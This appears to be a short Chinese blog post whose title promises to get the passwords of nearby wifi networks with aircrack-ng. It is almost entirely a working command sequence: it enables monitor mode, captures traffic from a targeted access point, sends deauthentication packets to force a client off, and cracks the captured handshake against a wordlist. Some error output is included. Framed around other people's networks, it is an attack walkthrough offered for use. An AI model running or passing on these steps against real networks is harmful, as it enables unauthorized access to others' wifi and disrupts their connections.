利用aircrack-ng工具获取附近wifi的密码
| 1 | service network-manager stop |
| 1 | airmon-ng check kill |
| 1 | iwconfig |
| 1 | airmon-ng start wlan0 |
| 1 | airodump-ng mon0 |
| 1 | C0:XX:XX:XX:XX:00 14:XX:XX:XX:XX:B4 -87 0 - 1 3 2 |
| 1 | airodump-ng --bssid C0:XX:XX:XX:XX -c 1 -w tmp mon0 |
| 1 | aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0 |

| 1 | airmon-ng stop mon0 |
| 1 | service network-manager start |
| 1 | aircrack-ng tmp-01.cap -w /tmp/passwd.txt |

| 1 | aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0 |
| 1 2 3 | 11:41:04 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1 11:41:04 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch Please specify an ESSID (-e). |
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!
